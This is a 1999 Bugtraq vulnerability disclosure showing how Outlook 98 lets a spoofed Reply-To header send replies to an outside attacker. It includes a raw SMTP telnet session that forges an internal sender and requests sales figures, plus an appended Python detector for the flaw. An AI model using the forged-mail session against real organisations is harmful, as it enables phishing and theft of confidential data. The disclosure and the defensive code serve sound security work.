Bugtraq mailing list archives
Outlook 98 allows spoofing internal users
From: nate () root org (Nate Lawson)
Date: Tue, 20 Apr 1999 15:10:05 -0700
Problem: Outlook uses a sender's Reply-To address silently, allowing a user to inadvertently send data to an Internet mail account when intending to reply to an internal, trusted user.

Impact: Anyone on the Internet can spoof a trusted internal Exchange user and get replies sent back to themselves without the user knowing they weren't responding to another internal user.

How to reproduce:

1. Spoof mail as an internal user with a Reply-To address claiming to be an internal user, but an address of an Internet account, say hotmail.

2. Go into Outlook and read the mail. The mail looks like it was internally generated, but viewing the full Internet headers under View->Options shows the bogus Reply-To header.

3. Hit Reply in Outlook. The To: field looks like it's going to a valid internal user, but right-clicking on it and choosing Properties shows that the internal user it is sending the reply to is actually an Internet address.

4. Enter some text and hit Send. Observe that the mail went to the attacker's account, not the internal one.

A quick script:

{root 5:00pm} ~> telnet mail.example.com 25
Trying 10.20.2.5...
Connected to mail.example.com.
Escape character is '^]'.
220 mail.example.com ESMTP Server (Microsoft Exchange Internet Mail Service 5.5.2448.0) ready
helo losebag
250 OK
mail from:<>
250 OK - mail from <>
rcpt to:<accounting () example com>
250 OK - Recipient <accounting () example com>
data
354 Send data. End with CRLF.CRLF
From: Nate Lawson
To: Accounting
Reply To: Nate Lawson<intruder () hotmail com>
Subject: important!

Please reply with the latest copy of our sales figures!

Thanks,
Nate
.
250 OK
quit
221 closing connection
Connection closed by foreign host.

Now, a reply to the email will go not to the trusted internal user Nate Lawson <nlawson () example com> but to the attacker, <intruder () hotmail com>. Worse, the user sees no indication that the mail is outward-bound! The To: field on the reply simply shows "Nate Lawson", a valid internal user.
Affected programs: Only tested on Outlook 98

Known use of this bug to get confidential information: none yet

Suggested Fix: always show the full email address of any recipient that is not local (i.e. username () example com would be hidden but any instance of user () hotmail com would be shown)

Microsoft has been notified, but claimed this was a weakness in SMTP and would not be fixed until a secure successor to SMTP is implemented. They obviously missed the point -- the error is not in that mail can be forged, but that Outlook allows a user to respond to a message that looks local and legitimate, but is actually destined for an outside address.

-Nate
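The following is an added example, not part of Nate Lawson's post or of any Microsoft code. It implements the check the post's suggested fix calls for: resolve where a Reply would actually go (Reply-To if present, otherwise From, which is the standard RFC 822 behaviour Outlook follows), and render the recipient as a bare display name only when the address is in the local domain, showing the full address for anything external. It also flags the exact condition described in the post, a From that looks internal while the reply target is outside. The local domain (example.com) and the two sample messages are assumptions constructed for the example; the spoofed one mirrors the telnet session above with a proper Reply-To header.

```python
"""Added example (not from the original post): render a reply's recipient the
way the post's suggested fix asks for, and flag replies that would leave the
local domain even though the sender looked internal.

Assumptions (not in the original): the local domain is example.com and the
message arrives as raw RFC 822 text. Both sample messages are constructed."""
from email import message_from_string
from email.utils import getaddresses

LOCAL_DOMAIN = "example.com"  # assumed internal domain

# Constructed to mirror the post's spoofed message: From looks internal,
# Reply-To carries the same display name but an outside mailbox.
SPOOFED = (
    "From: Nate Lawson <nlawson@example.com>\r\n"
    "To: Accounting <accounting@example.com>\r\n"
    "Reply-To: Nate Lawson <intruder@hotmail.com>\r\n"
    "Subject: important!\r\n"
    "\r\n"
    "Please reply with the latest copy of our sales figures!\r\n"
)

# Constructed legitimate internal message with no Reply-To header.
LEGIT = (
    "From: Nate Lawson <nlawson@example.com>\r\n"
    "To: Accounting <accounting@example.com>\r\n"
    "Subject: sales figures\r\n"
    "\r\n"
    "Can you send me the latest numbers?\r\n"
)


def _domain(addr):
    """Domain part of an address, lower-cased; empty if there is no '@'."""
    return addr.rpartition("@")[2].lower()


def reply_targets(raw, local_domain=LOCAL_DOMAIN):
    """Addresses a Reply would be sent to, as (display_name, address, is_external).

    Reply-To wins over From when present; that is the behaviour the post exploits."""
    msg = message_from_string(raw)
    header = "Reply-To" if msg.get("Reply-To") else "From"
    return [
        (name, addr, _domain(addr) != local_domain.lower())
        for name, addr in getaddresses(msg.get_all(header, []))
    ]


def render_recipient(name, addr, is_external):
    """To: entry as the post suggests: bare display name for local users,
    display name plus the full address for anything outside the local domain."""
    return f"{name} <{addr}>" if is_external else name


def reply_to_field(raw, local_domain=LOCAL_DOMAIN):
    """The To: line a reply to `raw` should display."""
    return ", ".join(render_recipient(*t) for t in reply_targets(raw, local_domain))


def reply_redirected_externally(raw, local_domain=LOCAL_DOMAIN):
    """True when every From address is local but at least one reply target is
    external: the message looks internal yet the reply leaves the organisation."""
    msg = message_from_string(raw)
    from_addrs = [a for _, a in getaddresses(msg.get_all("From", []))]
    from_local = bool(from_addrs) and all(_domain(a) == local_domain.lower() for a in from_addrs)
    return from_local and any(ext for _, _, ext in reply_targets(raw, local_domain))


if __name__ == "__main__":
    for label, raw in (("spoofed", SPOOFED), ("legit", LEGIT)):
        print(f"{label:8} To: {reply_to_field(raw):40} "
              f"redirected={reply_redirected_externally(raw)}")
```

Run stand-alone, the spoofed message renders as "Nate Lawson <intruder@hotmail.com>" and is flagged, while the legitimate one renders as just "Nate Lawson", which is the distinction the post says Outlook 98 failed to draw.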